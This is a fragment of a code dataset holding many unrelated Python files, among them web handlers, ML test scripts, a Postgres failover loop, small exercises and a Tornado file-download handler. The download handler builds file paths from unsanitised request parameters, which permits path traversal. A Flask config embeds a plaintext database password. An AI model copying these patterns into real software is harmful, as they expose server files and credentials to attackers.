failed')\n\nclass AddAuthor(BaseHandler):\n def get(self):\n user = self.get_current_user()\n if not user:\n self.redirect('/')\n return\n \n try:\n chapter = db.get( self.request.get('chapter') )\n except:\n self.redirect('/')\n return\n \n if not chapter or not chapter.canEdit(user):\n self.redirect('/')\n return\n \n nickname = self.request.get('author')\n user1 = get_user(nickname)\n \n res = {}\n\n if user1:\n res['status'] = 'OK'\n chapter.add_author(user1)\n chapter.put()\n else:\n res['status'] = \"User '\" +nickname+ \"' isn't registered.\"\n \n self.response.out.write(json.dumps(res))\n\nclass RemoveAuthor(BaseHandler):\n def get(self):\n user = self.get_current_user()\n if not user:\n self.redirect('/')\n return\n \n try:\n chapter = db.get( self.request.get('chapter') )\n except:\n self.redirect('/')\n return\n \n if not chapter or not chapter.isOwner(user):\n self.redirect('/')\n return\n \n nickname = self.request.get('author')\n user1 = get_user(nickname)\n \n res = {}\n res['status'] = 'OK'\n\n 
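# only modify the chapter when the nickname resolved to a registered user\n 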
if user1:\n chapter.remove_author(user1)\n chapter.put()\n \n self.response.out.write(json.dumps(res))\n","sub_path":"chapter_module.py","file_name":"chapter_module.py","file_ext":"py","file_size_in_byte":8575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"529344559","text":"dic={\n 'ball':'red',\n 'bat':4,\n 'wickets':8,\n 'ball':'green',\n 'bat':3\n }\ntemp = [] \nres = dict() \nfor key, val in dic.items(): \n if val not in temp: \n temp.append(val) \n res[key] = val \nprint(res)","sub_path":"duplicate_keys(6).py","file_name":"duplicate_keys(6).py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"358645983","text":"\"\"\"\nTesting for implementations - Will\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nimport numpy as np\nfrom sklearn import metrics\nfrom datetime import datetime as dt\nimport os\nimport transformers\nimport logging as log\nimport sys\n\nimport myio\nimport model\n\n# ============================= Testing Data Loading ==============================\nwd = os.getcwd()\n\n\n# for Spyder to get logging to work\nroot = log.getLogger()\nwhile len(root.handlers):\n root.removeHandler(root.handlers[0])\n\n# define logger\nlog_fname = os.path.join(wd, \"logs\", \"log_{}.log\".format(\n dt.now().strftime(\"%Y%m%d_%H%M\")))\nlog.basicConfig(filename=log_fname,\n format='%(asctime)s - %(name)s - %(message)s',\n level=log.INFO)\nroot.addHandler(log.StreamHandler())\n\nlog.info('Start')\nif True:\n \n # set parameters for IO object\n data_dir = os.path.join(wd, r'cleaned')\n task_names = ['tester']\n tokenizer = transformers.AutoTokenizer.from_pretrained('albert-base-v2')\n max_length = 512\n \n # read in 'tester' data in both train and dev directories\n # only do batch_size of 2\n data_handler = myio.IO(data_dir, task_names, tokenizer, max_length, batch_size = 2)\n data_handler.read_task() \n \n # see that it works\n if False:\n for use in ['train','dev']:\n # get training data_loader\n dl = data_handler.tasks.get('tester').get(use)\n for i,(data, labels) in enumerate(dl):\n print(r'{} batch {} data size is: {}'.format(use, i, data.size()))\n print(r'{} batch {} data is: {}'.format(use, i, data))\n \n for k, obs in enumerate(data):\n print(r'{} batch {} obs {} decoded: {}'.format(use, i, k, tokenizer.decode(obs.tolist())))\n \n print(r'{} batch {} size is: {}'.format(use, i, labels.size()))\n print(r'{} batch {} is: {}'.format(use, i, labels))\n\n# ============================= Test Model ==============================\nif True: \n rep_name = 'albert-base-v2'\n \n loss = nn.CrossEntropyLoss()\n \n config = transformers.AutoConfig.from_pretrained(rep_name)\n learner = model.Model(config, 5, 2)\n \n test_dl = data_handler.tasks.get('tester').get('test')\n \n with torch.no_grad():\n test_data, val_labels = next(iter(test_dl))\n rating, flag = learner(test_data)\n \n print(rating)\n print(flag)\n \n r_val, r_idx = torch.max(rating, dim=1)\n f_val, f_idx = torch.max(flag, dim=1)\n \n r_labels = val_labels[:,0]\n f_labels = val_labels[:,1]\n \n \n r_acc = metrics.accuracy_score(r_labels, r_idx)\n r_f1 = metrics.f1_score(r_labels, r_idx, average='macro')\n \n f_acc = metrics.accuracy_score(f_labels, f_idx)\n f_f1 = metrics.f1_score(f_labels, f_idx, average='macro')\n \n print(r_idx)\n print(r_labels)\n print(r_acc)\n print(r_f1)\n print('='*40)\n print(f_idx)\n print(f_labels)\n print(f_acc)\n print(f_f1)\n print('='*40)\n \n 
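# cross-entropy of each head's raw logits against its gold labels\n 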
print(loss(rating, r_labels))\n print(loss(flag, f_labels))\n \nlog.info('End') \n\n# release logs from Python\nhandlers = log.getLogger().handlers\nfor handler in handlers:\n handler.close()\n \n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n ","sub_path":"examples/will_bds_example/tester_wh.py","file_name":"tester_wh.py","file_ext":"py","file_size_in_byte":3782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"511472986","text":"import logging\n\nfrom helpers.errors import EtcdError\nfrom psycopg2 import InterfaceError, OperationalError\n\nlogger = logging.getLogger(__name__)\n\n\nclass Ha:\n\n def __init__(self, state_handler, etcd):\n self.state_handler = state_handler\n self.etcd = etcd\n self.cluster = None\n\n def load_cluster_from_etcd(self):\n self.cluster = self.etcd.get_cluster()\n\n def acquire_lock(self):\n return self.etcd.attempt_to_acquire_leader(self.state_handler.name)\n\n def update_lock(self):\n return self.etcd.update_leader(self.state_handler)\n\n def has_lock(self):\n lock_owner = self.cluster.leader and self.cluster.leader.hostname\n logger.info('Lock owner: %s; I am %s', lock_owner, self.state_handler.name)\n return lock_owner == self.state_handler.name\n\n def demote(self):\n return self.state_handler.demote(self.cluster.leader)\n\n def follow_the_leader(self):\n return self.state_handler.follow_the_leader(self.cluster.leader)\n\n def run_cycle(self):\n try:\n self.load_cluster_from_etcd()\n if not self.state_handler.is_healthy():\n has_lock = self.has_lock()\n self.state_handler.write_recovery_conf(None if has_lock else self.cluster.leader)\n self.state_handler.start()\n if not has_lock:\n return 'started as a secondary'\n logging.info('started as readonly because i had the session lock')\n self.load_cluster_from_etcd()\n\n if self.cluster.is_unlocked():\n if self.state_handler.is_healthiest_node(self.cluster):\n if self.acquire_lock():\n if self.state_handler.is_leader() or self.state_handler.is_promoted:\n return 'acquired session lock as a leader'\n self.state_handler.promote()\n return 'promoted self to leader by acquiring session lock'\n else:\n self.load_cluster_from_etcd()\n if self.state_handler.is_leader():\n self.demote()\n return 'demoted self after trying and failing to obtain lock'\n else:\n self.follow_the_leader()\n return 'following new leader after trying and failing to obtain lock'\n else:\n self.load_cluster_from_etcd()\n if self.state_handler.is_leader():\n self.demote()\n return 'demoting self because i am not the healthiest node'\n else:\n self.follow_the_leader()\n return 'following a different leader because i am not the healthiest node'\n else:\n if self.has_lock() and self.update_lock():\n try:\n if self.state_handler.is_leader() or self.state_handler.is_promoted:\n return 'no action. i am the leader with the lock'\n self.state_handler.promote()\n return 'promoted self to leader because i had the session lock'\n finally:\n # create replication slots\n self.state_handler.create_replication_slots(self.cluster)\n else:\n logger.info('does not have lock')\n if self.state_handler.is_leader():\n self.demote()\n return 'demoting self because i do not have the lock and i was a leader'\n else:\n self.follow_the_leader()\n return 'no action. 
i am a secondary and i am following a leader'\n except EtcdError:\n logger.error('Error communicating with Etcd')\n if self.state_handler.is_leader():\n self.state_handler.demote(None)\n return 'demoted self because etcd is not accessible and i was a leader'\n except (InterfaceError, OperationalError):\n logger.error('Error communicating with Postgresql. Will try again')\n","sub_path":"helpers/ha.py","file_name":"ha.py","file_ext":"py","file_size_in_byte":4282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"28812647","text":"import logging\nimport json\n\nLANGUAGES = {\n 'en': u'English',\n 'fr': u'Français',\n 'pt': u'Português',\n}\n\nHOST = 'http://med-db.medicines.localhost:5000/'\nAPI_HOST = 'http://med-db-api.medicines.localhost:5001/'\nSERVER_NAME = 'medicines.localhost:5000'\n\nLOG_LEVEL = logging.DEBUG\nLOGGER_NAME = \"med-db-logger\" # make sure this is not the same as the name of the package to avoid conflicts with Flask's own logger\nDEBUG = True\n\nSQLALCHEMY_DATABASE_URI = 'postgresql+psycopg2://med_db:med_db@localhost/med_db'\nSQLALCHEMY_ECHO = True\n\nRESULTS_PER_PAGE = 50\n\nADMIN_USER = \"admin@code4sa.org\"\n\nMAX_AGE = 365\n","sub_path":"instance/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"412820777","text":"\nfrom mongoengine import *\nimport datetime\nimport json\nimport requests\n\nconnect('test')\n\n# Schema for the MongoDB test database\n\nclass addr(EmbeddedDocument):\n building = StringField()\n street = StringField()\n city = StringField()\n zipcode = IntField()\n coord = GeoPointField()\n\nclass likes(EmbeddedDocument):\n grade = StringField(max_length=1)\n score = IntField()\n date = DateTimeField()\n\nclass restaurants(Document):\n name = StringField(required=True, max_length=80)\n restaurant_id = IntField()\n cuisine = StringField()\n borough = StringField()\n address = EmbeddedDocumentField(addr)\n grades = ListField(EmbeddedDocumentField(likes))\n\n\n# Inserts the restaurant into the DB with Google's geolocation\ndef addRestaurant(nameFunc, cityFunc, cuisineFunc, boroughFunc):\n r = requests.get('http://maps.googleapis.com/maps/api/geocode/json?address='+nameFunc.replace(\" \", \"+\")+\"+\"+cityFunc.replace(\" \", \"+\"))\n decoded = json.loads(r.text)\n\n streetJS = decoded[\"results\"][0][\"address_components\"][1][\"long_name\"]\n cityJS = decoded[\"results\"][0][\"address_components\"][3][\"long_name\"]\n zipcodeJS = decoded[\"results\"][0][\"address_components\"][6][\"long_name\"]\n coordLatJS = decoded[\"results\"][0][\"geometry\"][\"location\"][\"lat\"]\n coordLngtJS = decoded[\"results\"][0][\"geometry\"][\"location\"][\"lng\"]\n\n\n dir = addr(street=streetJS, city=cityJS, zipcode=zipcodeJS, coord=[coordLatJS, coordLngtJS])\n r = restaurants(name=nameFunc, cuisine=cuisineFunc, borough=boroughFunc, address=dir)\n r.save()\n\n\naddRestaurant(\"Real asador de castilla\", \"Granada\", \"Asador\", \"Centro\")\naddRestaurant(\"El tintero\", \"Malaga\", \"Pescaito\", \"Playa\")\naddRestaurant(\"Los diamantes\", \"Granada\", \"Pescaito\", \"Centro\")\n\n\nprint(\"-----Tres primeros restaurantes\")\n# Query: the first three restaurants\nfor r in restaurants.objects[:3]:\n print (r.name, r.address.coord, r.grades[0].date)\n\nprint(\"-----Restaurantes de Pescaito\")\n# Listing the restaurants whose cuisine is 'Pescaito'\nfor r in restaurants.objects(cuisine='Pescaito'):\n print 
(r.name)\n\nprint(\"-----Restaurante que no esta en el centro\")\n# First 10 restaurants that are not in the Centro borough\nfor r in restaurants.objects(borough__ne='Centro')[:10]:\n print (r.name)\n\nprint(\"-----Restaurantes cerca del punto\")\n# Testing the geolocation queries\n# Restaurants near the ones inserted as examples\nfor r in restaurants.objects(address__coord__within_distance=[(37.17, -3.59), 0.01]):\n print (r.name, r.address.coord)\n","sub_path":"tarea3/popylate.py","file_name":"popylate.py","file_ext":"py","file_size_in_byte":2571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"269568777","text":"'''\r\nCount Possible Decodings of a given Digit Sequence\r\nLet 1 represent ‘A’, 2 represents ‘B’, etc. Given a digit sequence, count the number of possible decodings of the given\r\n digit sequence\r\n Input: digits[] = \"121\"\r\nOutput: 3\r\n// The possible decodings are \"ABA\", \"AU\", \"LA\"\r\n\r\n'''\r\n\r\ndef decode(digit,n):\r\n count=[0]*(n+1)\r\n count[0],count[1]=1,1\r\n\r\n for i in range(2,n+1):\r\n count[i]=0\r\n\r\n # If the last digit is not 0, then last\r\n # digit must add to the number of words\r\n if digit[i-1]>0:\r\n count[i]=count[i-1]\r\n\r\n # If the last two digits form a number\r\n # between 10 and 26, they also decode\r\n # as a single character\r\n if digit[i-2] == 1 or (digit[i-2] == 2 and digit[i-1] <= 6):\r\n count[i]+=count[i-2]\r\n return count[n]\r\n\r\nif __name__ == '__main__':\r\n arr=[1,2,3,4]\r\n print(decode(arr,len(arr)))","sub_path":"decode_seq_interpretation.py","file_name":"decode_seq_interpretation.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"14463166","text":"import matplotlib.pyplot as plt\n\ndata = (20, 10, 30, 25)\nlabels = 'SH', 'BJ', 'SZ', 'GZ'\ncolors = ('red', 'green', 'blue', 'yellow')\nexplode = (0, 0, 0.2, 0.05)\n\n# By default the pie chart's x and y axes are not 1:1, so the pie looks elliptical; force a 1:1 aspect ratio to draw a true circle\nplt.axes(aspect=1)\n\nplt.pie(x=data,labels=labels,colors=colors,explode=explode, autopct='%0.1f%%', shadow=True)\nplt.show()\n","sub_path":"项目二/Report 1/[Task1]学习python/project_matplotlib/src/piedemo.py","file_name":"piedemo.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"597369548","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"wiki/\", views.wiki, name=\"wiki\"),\n path(\"search\", views.search, name=\"search\"),\n path(\"new\", views.new_page, name=\"new\")\n]\n","sub_path":"encyclopedia/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"182059652","text":"#---------------------------------------------------------------#\n#\n# Disarm That Bomb!\n#\n# We've all seen films and television shows where the hero needs\n# to disarm a time bomb by cutting the wires leading to the\n# trigger. But which wire to cut first!?! Tension mounts as\n# our hero tries to choose between the red, green and blue\n# wires...!!!\n#\n# Below is a Tkinter-based program that attempts to simulate\n# this scenario. It provides three buttons representing\n# choices of wires to cut and randomly generates the correct\n# sequence. Pushing the buttons in the correct sequence\n# ends the game with a congratulatory message. 
However,\n# pushing the buttons in the wrong sequence produces error\n# messages in the shell window and prevents the game from\n# reaching a final outcome.\n#\n# Your task is to modify this program so that it doesn't\n# misbehave when the wrong button is pressed and always ends\n# the game properly, either with the bomb being disarmed\n# or exploding. When an incorrect button is pressed it should:\n#\n# a) Display a message in the GUI indicating that the bomb\n# has exploded; and\n# b) Disable all the buttons because the game is over.\n#\n# Importantly, however, you cannot change, delete or disable\n# any of the existing lines of Python code. Instead you must\n# use your knowledge of exception handling to prevent the\n# existing code misbehaving, but without changing it in any\n# way.\n#\n\n# Import the Tkinter functions\nfrom tkinter import Tk, Button, Frame, Label, DISABLED\n\n# Import a random number function\nfrom random import shuffle\n\n# Create a window\nbomb_display = Tk()\n\n# Give the window a title\nbomb_display.title('Disarm That Bomb!')\n\n# Create a label to display the current state of the bomb\ndisplay = Label(bomb_display, font = ('Arial', 48),\n text = \"It's ticking...!\",\n width = 16, bg = 'gold')\n\n# Global variable to define valid sequence of cuts\nvalid_sequence = ['Red', 'Green', 'Blue']\nshuffle(valid_sequence)\n\n# Function that's called when any button is pressed\ndef button_pushed(button, colour):\n global valid_sequence\n # Disable this button so that it can't be pressed again\n button['state'] = DISABLED\n # Confirm that the buttons have been pushed in the right order\n assert valid_sequence[0] == colour\n # Remove the first item from the sequence of pushes required\n valid_sequence.pop(0)\n # See if the bomb has been disarmed yet\n if valid_sequence == []:\n display['text'] = \"You've done it!\"\n display['bg'] = 'green'\n else:\n display['text'] = colour + ' wire cut!'\n \n# The individual functions called when the buttons are pressed\ndef cut_red():\n button_pushed(red_button, 'Red')\n\ndef cut_blue():\n button_pushed(blue_button, 'Blue')\n\ndef cut_green():\n button_pushed(green_button, 'Green')\n\n# Create a frame to hold the buttons\nbuttons = Frame()\n\n# Create the push button widgets\nred_button = Button(buttons, text = ' Cut red wire ',\n activeforeground = 'red', font = ('Arial', 20),\n command = cut_red)\nblue_button = Button(buttons, text = ' Cut blue wire ',\n activeforeground = 'red', font = ('Arial', 20),\n command = cut_blue)\ngreen_button = Button(buttons, text = ' Cut green wire ',\n activeforeground = 'red', font = ('Arial', 20),\n command = cut_green)\n\n# Use the grid geometry manager to put the widgets into their locations\ndisplay.grid(row = 0, column = 0, padx = 5, pady = 10)\nred_button.grid(row = 0, column = 0)\nblue_button.grid(row = 0, column = 1)\ngreen_button.grid(row = 0, column = 2)\nbuttons.grid(row = 1, column = 0)\n\n# Start the event loop to react to user inputs\nbomb_display.mainloop()\n","sub_path":"Workshop11-Questions/8-disarm-that-bomb.py","file_name":"8-disarm-that-bomb.py","file_ext":"py","file_size_in_byte":3770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"448363822","text":"import time\n\nname = 'lana'\nresponse = 'what'\npunchline = 'thats how you get ants'\n\n\ndef run():\n print('\\n'*100)\n time.sleep(1)\n\n for i in range(3):\n if i == 2:\n print('{}!'.format(name.upper()))\n time.sleep(0.25)\n else:\n print('{}...'.format(name))\n 
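# pause before the exasperated reply\n 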
time.sleep(3)\n\n print('{}!!?'.format(response.upper()))\n time.sleep(1.5)\n print('{}, {}...'.format(punchline, name.upper()))\n time.sleep(3)\n print('\\n'*5)\n\nif __name__ == '__main__':\n run()\n","sub_path":"lana.py","file_name":"lana.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"49802558","text":"\"\"\"\n{\n \"author\": \"Yucheng Huang\",\n \"difficulty\": \"easy\",\n \"link\": \"https://leetcode.com/problems/sum-of-left-leaves/description/\",\n \"beats\": 0.4776,\n \"category\": [\"tree\"],\n \"tags\": [\"DFS\"],\n \"questions\": []\n}\n\"\"\"\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def DFS(self, node, isLeft):\n assert node is not None\n if node.left is None and node.right is None and isLeft:\n self.ans += node.val\n return\n if node.left:\n self.DFS(node.left, True)\n if node.right:\n self.DFS(node.right, False)\n \n def sumOfLeftLeaves(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n self.ans = 0\n if root is None:\n return 0\n self.DFS(root, False)\n return self.ans","sub_path":"solutions/404.py","file_name":"404.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"97085874","text":"from .utils import *\nfrom .darknet import Darknet\nimport cv2\nfrom PIL import Image, ImageDraw, ImageFont\nfrom .layer_to_boxes import layer_to_boxes as cuda\nimport torch\n\nclass Network():\n def __init__(self, cfgfile, weightfile, conf_thresh=0.5, nms_thresh=0.4, gpus=1):\n self.m = Darknet(cfgfile) # model <=> m\n self.m.print_network()\n self.m.load_weights(weightfile)\n self.conf_thresh = conf_thresh\n self.nms_thresh = nms_thresh\n print('Loading weights from %s... Done!' 
% (weightfile))\n\n if self.m.num_classes == 20:\n namesfile = 'data/voc.names'\n elif self.m.num_classes == 80:\n namesfile = 'data/coco.names'\n else:\n namesfile = 'data/person.names'\n class_names = load_class_names(namesfile)\n \n self.m.eval()\n self.net = self.m\n\n def get_region_boxes(self, output):\n anchor_step = len(self.m.anchors)//self.m.num_anchors\n assert(output.size(1) == (5+self.m.num_classes)*self.m.num_anchors)\n h = output.size(2)\n w = output.size(3)\n\n # 0.04523301124572754\n # t1 = time.time()\n output = output.view(self.batch*self.m.num_anchors, 5+self.m.num_classes, h*w).transpose(0,1).contiguous().view(5+self.m.num_classes, self.batch*self.m.num_anchors*h*w)\n # print(time.time()-t1)\n # t1 = time.time()\n grid_x = torch.linspace(0, w-1, w).repeat(h,1).repeat(self.batch*self.m.num_anchors, 1, 1).view(self.batch*self.m.num_anchors*h*w)\n grid_y = torch.linspace(0, h-1, h).repeat(w,1).t().repeat(self.batch*self.m.num_anchors, 1, 1).view(self.batch*self.m.num_anchors*h*w)\n # print(time.time()-t1)\n # t1 = time.time()\n xs = torch.sigmoid(output[0]) + grid_x\n ys = torch.sigmoid(output[1]) + grid_y\n # print(time.time()-t1)\n\n anchor_w = torch.Tensor(self.m.anchors).view(self.m.num_anchors, anchor_step).index_select(1, torch.LongTensor([0]))\n anchor_h = torch.Tensor(self.m.anchors).view(self.m.num_anchors, anchor_step).index_select(1, torch.LongTensor([1]))\n anchor_w = anchor_w.repeat(self.batch, 1).repeat(1, 1, h*w).view(self.batch*self.m.num_anchors*h*w)\n anchor_h = anchor_h.repeat(self.batch, 1).repeat(1, 1, h*w).view(self.batch*self.m.num_anchors*h*w)\n ws = torch.exp(output[2]) * anchor_w\n hs = torch.exp(output[3]) * anchor_h\n\n det_confs = torch.sigmoid(output[4])\n\n cls_confs = torch.nn.Softmax(dim=-1)(Variable(output[5:5+self.m.num_classes].transpose(0,1))).data\n cls_max_confs, cls_max_ids = torch.max(cls_confs, 1)\n cls_max_confs = cls_max_confs.view(-1)\n cls_max_ids = cls_max_ids.view(-1)\n\n # t1 = time.time()\n all_boxes = cuda.layer_to_boxes(self.batch, w,h, self.m.num_anchors, self.vector_sizes, self.conf_thresh, det_confs,cls_max_confs,cls_max_ids,xs,ys,ws,hs)\n # print(time.time()-t1)\n return all_boxes\n\n def do_detect(self, img):\n if type(img) == np.ndarray: # cv2 image\n img = torch.from_numpy(img.transpose(0,3,1,2)).float().div(255.0)\n img = torch.autograd.Variable(img)\n output = self.net(img)\n\n output = output.data\n all_boxes = self.get_region_boxes(output)\n final_boxes = []\n for i in range(output.size(0)):\n boxes = all_boxes[i]\n final_boxes.append(nms(boxes, self.nms_thresh))\n return final_boxes\n def return_predict(self,img):\n img_vector = []\n self.vector_sizes = []\n self.batch = img.shape[0]\n for i in range(self.batch):\n self.vector_sizes.append(img[i].shape[:2])\n img_vector.append( cv2.resize(img[i], (self.m.width, self.m.height)) )\n sized = np.array(img_vector)\n bboxes = self.do_detect(sized)\n return bboxes\n\ndef plot_cv2_image(bboxes, img):\n draw = np.zeros_like(img)\n for s, b in enumerate(bboxes):\n for i in b:\n print(i, tuple(i[:2]), tuple(i[2:4]))\n draw[s] = cv2.rectangle(img[s], tuple(i[:2]), tuple(i[2:4]), (255,0,0), 1) \n return draw\n\n\n###########################################\n################## Test ###################\n###########################################\ndef test(*args):\n try:\n assert(len(args)==5) # cfgfile, weightfile, gpus, batch_size, IterationTimes\n cfgfile, weightfile, gpus, batch_size_FOR_TEST, IterationTimes = args\n assert(type(cfgfile)==str) # config file\n 
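# remaining argument checks; an AssertionError falls through to the usage text below\n 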
assert(type(weightfile)==str) # weights file\n assert(type(gpus)==int and gpus>0) # possible options: 1, other number to take all gpus\n assert(type(batch_size_FOR_TEST)==int and batch_size_FOR_TEST>0) # batch size\n assert(type(IterationTimes)==int and IterationTimes>0) # Iteration times\n\n img = cv2.imread('./data/person_1.jpg')\n # img = np.uint8(np.random.rand(512,512,3)*255) # input: stacked camera images with size of 512x512x3 and type is np.uint8\n img = np.repeat(img[None,:],batch_size_FOR_TEST,axis=0)\n net = Network(cfgfile, weightfile, conf_thresh=0.5, nms_thresh=0.4, gpus=gpus)\n\n if IterationTimes==1:\n bboxes = net.return_predict(img)\n output = plot_cv2_image(bboxes, img)\n output_img = output[-1]\n cv2.imwrite('output_image.png', output_img)\n else:\n meant=0\n bboxes = net.return_predict(img)\n times = IterationTimes\n for i in range(times):\n print(i)\n t1=time.time()\n bboxes = net.return_predict(img)\n meant += time.time()-t1\n meant /= times\n print(\"{:.4f} fps\".format(1/meant))\n\n except AssertionError:\n print('To test, the variable -img- can be either a real input image or random noise')\n print('The input arguments in test function are the following: ')\n print('cfgfile weightfile GPUs BatchSize IterationTimes')\n print('')\n print('cfgfile:\\tYolo configuration file')\n print('weightfile:\\tYolo weights file')\n print('GPUs:\\t\\tnumber of GPUs employed to run Yolo')\n print('BatchSize:\\tNumber of camera images stacked in one batch')\n print('IterationTimes:\\tK Iterations for time processing testing (optional)')\n print('')\n print('')\n print('Usage:')\n print(' import module.main_module as module')\n print('')\n print(' module.test(cfg/yolo_person.cfg, backup/yolo_person.weights, 2, 8, 10) ')\n print(' perform detection on multiple cameras using pipeline workflow and compute the mean time in 10 iterations')\n print('or')\n print(' module.test(cfg/yolo_person.cfg, backup/yolo_person.weights, 2, 1, 1) ')\n print(' perform detection on one camera using pipeline workflow')","sub_path":"module_cpu/main_module.py","file_name":"main_module.py","file_ext":"py","file_size_in_byte":7083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"72305380","text":"\nimport asyncpg\nfrom config import ServerParameters\nimport tornado.ioloop\nimport tornado.web\nimport tornado.websocket\nfrom tornado import gen\nimport json\nimport datetime\nimport asyncio\nimport tigerfunctools\nfrom dateutil import parser\nfrom tornado.escape import utf8, _unicode\nfrom tornado.platform.asyncio import AsyncIOMainLoop\nfrom tornado import gen\nimport asyncio\nimport uuid\nimport os\nfrom PIL import Image\nimport io\nfrom urllib import parse as urlparse\n\nclass download_Handler(tornado.web.RequestHandler):\n async def post(self):\n self.flush()\n pass\n\n async def get(self):\n inputdict = dict((k, v[-1]) for k, v in self.request.arguments.items())\n\n filename = None\n filedb = \"\"\n smaxwidth = None\n smaxheight = None\n id = None\n\n if (\"filedb\" in inputdict.keys()):\n filedb = inputdict[\"filedb\"].decode(\"utf-8\")\n if (\"id\" in inputdict.keys()):\n id = inputdict[\"id\"].decode(\"utf-8\")\n if (id.isnumeric() == True):\n async with ServerParameters.pg_pool.acquire() as conn: # query the database to get the file name\n row = await conn.fetchrow(\"select * from files where files_id=$1;\", int(id))\n if row != None:\n filename = row[\"files_savefilename\"]\n filedb = row[\"files_fileid\"]\n else:\n filename = id\n else:\n if (\"filename\" in 
inputdict.keys()):\n filename = inputdict[\"filename\"].decode(\"utf-8\")\n\n if filename == None:\n self.set_status(404)\n return\n if len(filedb) > 0:\n filedb = filedb + \"/\" # 加上路径符号\n\n if (\"maxwidth\" in inputdict.keys()):\n smaxwidth = inputdict[\"maxwidth\"].decode(\"utf-8\")\n if (\"maxheight\" in inputdict.keys()):\n smaxheight = inputdict[\"maxheight\"].decode(\"utf-8\")\n\n maxwidth = 0\n maxheight = 0\n if (smaxwidth != None):\n maxwidth = int(smaxwidth)\n if (smaxheight != None):\n maxheight = int(smaxheight)\n\n maxstr = \"\"\n if (maxwidth != 0 or maxheight != 0):\n maxstr = str(maxwidth) + \"_\" + str(maxheight)\n\n f = open(ServerParameters.filespath + filedb + filename, \"rb\")\n m_time = datetime.datetime.fromtimestamp(os.path.getmtime(ServerParameters.filespath + filedb + filename))\n\n r_time = utf8(self.request.headers.get(\"If-Modified-Since\", \"\"))\n if (len(r_time) > 8):\n r_time = parser.parse(r_time)\n if (r_time == m_time):\n self.set_status(304) # 文件相同\n return\n\n isimage = False\n f.seek(0, 2)\n filelength = f.tell()\n isresize = False\n newds = None\n\n if (filename.find(\".jpg\") >= 0 or filename.find(\".bmp\") >= 0 or filename.find(\".gif\") >= 0 or filename.find(\n \".png\") >= 0):\n isimage = True\n if (maxheight == 0 and maxwidth == 0):\n newds = None\n else:\n newds = AsycnGetCustomSmallPic(f, maxwidth, maxheight)\n if (newds != None):\n newds.seek(0, 2)\n filelength = newds.tell()\n isresize = True\n newds.seek(0, 0)\n\n '''\n etag = str(fi.upload_date) + str(filelength)\n self.set_header(\"Etag\", etag)\n\n if (self.check_etag_header()==True):\n ds.close()\n newds.close()\n self.set_status(304)\n return\n '''\n\n p = 0\n range = self.request.headers.get(\"Range\", \"\")\n if (len(range) > 0):\n self.set_status(205) # 断点续传\n p = int(range.replace(\"bytes=\", \"\").replace(\"-\", \"\"))\n if (p >= filelength):\n return\n self.set_header(\"Content-Range\", \"bytes \" + str(p) + \"-\" + str(filelength - 1) + \"/\" + str(filelength))\n self.set_header(\"Content-Length\", str(filelength - p))\n if (isimage == True):\n self.set_header(\"Content-Type\", \"image/\" + \"jpg\")\n else:\n self.set_header(\"Content-Type\", \"application/octet-stream\")\n if (isresize):\n self.set_header(\"Content-Disposition\", \"attachment;\" + urlparse.urlencode({\"filename\": maxstr + filename}))\n else:\n self.set_header(\"Content-Disposition\", \"attachment;\" + urlparse.urlencode({\"filename\": filename}))\n self.add_header(\"Date\", datetime.datetime.now()) # .strftime(\"%a, %d %h %Y %H:%M:%S GMT\")\n self.add_header(\"Last-Modified\", m_time)\n self.add_header(\"Expires\", datetime.datetime.now() + datetime.timedelta(days=365))\n self.set_header(\"Cache-Control: public\", True)\n\n if (isresize):\n newds.seek(p)\n bbb = newds.read()\n self.write(bbb[p:])\n else:\n f.seek(p)\n bbb = f.read()\n self.write(bbb)\n\n if (newds != None):\n newds.close()\n if (f != None):\n f.close()\n self.flush()\n\n\ndef AsycnGetCustomSmallPic(inputstream, cwidth, cheight, bscale=True):\n if (inputstream == None):\n return None\n size = [150, 0]\n inputstream.seek(0)\n bbb = inputstream.read()\n img = Image.open(io.BytesIO(bbb))\n\n if (img == None):\n return None\n\n if (img.width <= cwidth and img.height <= cheight):\n return None\n if (cwidth == 0 and cheight == 0):\n cwidth = img.width\n cheight = img.height\n else:\n if (cwidth == 0):\n cwidth = (cheight * img.width) / img.height\n if (cheight == 0):\n cheight = (cwidth * img.height) / img.width\n\n srcRect = [0, 0, img.width, 
